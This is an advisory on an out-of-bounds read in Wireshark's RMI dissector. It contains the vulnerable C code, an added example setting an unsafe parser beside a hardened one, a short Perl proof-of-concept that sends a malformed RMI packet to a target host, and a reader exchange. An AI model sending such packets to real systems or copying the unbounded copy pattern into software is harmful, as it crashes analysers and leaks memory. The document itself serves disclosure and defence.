A vulnerability in the way Wireshark handles RMI packets allows attackers to cause the Wireshark program to read beyond the buffer used to store data, which in turn allows the attacker to read arbitrary memory and also crash the Wireshark product.
Credit:
The information has been provided by beSTORM.
Vulnerable Systems:
* Wireshark version 0.9.5 through 1.0.0
Immune Systems:
* Wireshark version 1.0.1 and newer
The RMI dissector was using g_strlcpy incorrectly, which could lead to information disclosure or worse.
The vulnerability is caused by faulty code:
    /* Fragment of the RMI dissector (packet-rmi.c) as shipped before the fix.
     * tvb is the packet buffer, offset the position of the EPID record. */
    len = tvb_get_ntohs(tvb, 1);                   /* 16-bit length, attacker controlled */
    proto_tree_add_uint(rmi_tree, hf_rmi_epid_length,
                        tvb, offset + 1, 2, len);
    memset(epid_hostname, 0, sizeof(epid_hostname));
    if (len < sizeof(epid_hostname)) {
        /* len only gates the branch; the copy itself ignores it and runs
         * until g_strlcpy finds a NUL after the tvb_get_ptr() pointer. */
        g_strlcpy(epid_hostname, tvb_get_ptr(tvb, offset + 3, len),
                  sizeof(epid_hostname));
    } else {
        g_strlcpy(epid_hostname,
                  "<string too long>", sizeof(epid_hostname));
    }
* len is read from the packet and is therefore attacker controlled.
* g_strlcpy never checks that len bytes are actually present: it copies from the source until it finds a NUL byte, so a packet can claim a length of X while carrying fewer bytes (on its own not yet a problem).
* If an RMI packet contains:
1) Very little data to copy from
2) A small value of len
3) No NULL termination
then the data Wireshark displays will include previous data from the stack.
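To make the defect concrete, the following added example (not code from the advisory or from Wireshark) models the dissector's copy against a constructed buffer in which an RMI EPID record is immediately followed by unrelated leftover bytes. The vulnerable parser reproduces the g_strlcpy pattern and picks up the leftovers; the hardened parser uses len both to validate what the packet really contains and to bound the copy. strlcpy_like is an assumed stand-in for g_strlcpy so the example needs no GLib, and the 32-byte hostname buffer is an assumption.

```c
#include <string.h>

/* Stand-in for g_strlcpy (no GLib dependency): scans src to its NUL, copies at most
 * dst_size-1 bytes and NUL-terminates. The scan, not the copy, is what leaks. */
static size_t strlcpy_like(char *dst, const char *src, size_t dst_size) {
    size_t src_len = strlen(src);
    size_t n = src_len < dst_size - 1 ? src_len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return src_len;
}

/* Constructed capture buffer: [0x4e][len hi][len lo][len hostname bytes, no NUL]
 * immediately followed by leftover bytes that are not part of the packet. Keeping
 * both in one array lets the demonstration stay inside a single allocation. */
static unsigned char arena[64];

static size_t build_arena(const char *host, const char *leftover) {
    size_t hlen = strlen(host);
    memset(arena, 0, sizeof arena);
    arena[0] = 0x4e;                              /* RMI ack code */
    arena[1] = (unsigned char)(hlen >> 8);        /* 16-bit big-endian length */
    arena[2] = (unsigned char)(hlen & 0xff);
    memcpy(arena + 3, host, hlen);                /* hostname, not NUL-terminated */
    memcpy(arena + 3 + hlen, leftover, strlen(leftover));
    return 3 + hlen;                              /* true packet length */
}

/* Vulnerable pattern from the advisory: len is checked against the buffer size but
 * never used to bound the copy, so the copy runs on until it finds a NUL. */
static void parse_epid_unsafe(const unsigned char *pkt, char *out, size_t out_size) {
    unsigned len = (pkt[1] << 8) | pkt[2];
    memset(out, 0, out_size);
    if (len < out_size)
        strlcpy_like(out, (const char *)pkt + 3, out_size);
    else
        strlcpy_like(out, "<string too long>", out_size);
}

/* Hardened: require len bytes to be present in the packet and copy exactly len. */
static int parse_epid_safe(const unsigned char *pkt, size_t pkt_len,
                           char *out, size_t out_size) {
    if (pkt_len < 3) return -1;
    unsigned len = (pkt[1] << 8) | pkt[2];
    if (len > pkt_len - 3 || len >= out_size) return -1;  /* truncated or oversized */
    memcpy(out, pkt + 3, len);
    out[len] = '\0';
    return (int)len;
}
```

Run against the constructed buffer, the unsafe parser yields "hostSECRET" while the safe one yields "host" and rejects a length field larger than the bytes actually present.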
Exploit:
    use strict;
    use warnings;
    use IO::Socket;

    # Hostname payload; empty here so the length field and the data disagree with
    # what the dissector goes on to read.
    my $data = "";
    my $length = pack('n', length($data));      # 16-bit big-endian length
    my $request_input_ack =
        "\x4e".          # ACK code
        $length.
        $data.
        "\x41\x41".      # dead bytes?
        "\x01\x01";      # port
    my $remote = IO::Socket::INET->new(Proto => "tcp", PeerAddr => '192.168.1.52', PeerPort => "1099");
    unless ($remote) { die "cannot connect to daemon on 192.168.1.52" }
    print $remote $request_input_ack;
    sleep(1);
    close($remote);
Subject: How is this an information disclosure
Date: 7 Aug. 2008
From: duper
I understand that this is a problem because it corrupts the memory of Wireshark which leads to a DoS, but how is it an information disclosure? Isn't the user of Wireshark able to read the data on their own stack anyway?
-- Editor note: Information disclosure is considered to occur whenever a program displays data it shouldn't. This is what is happening in Wireshark when it processes this packet.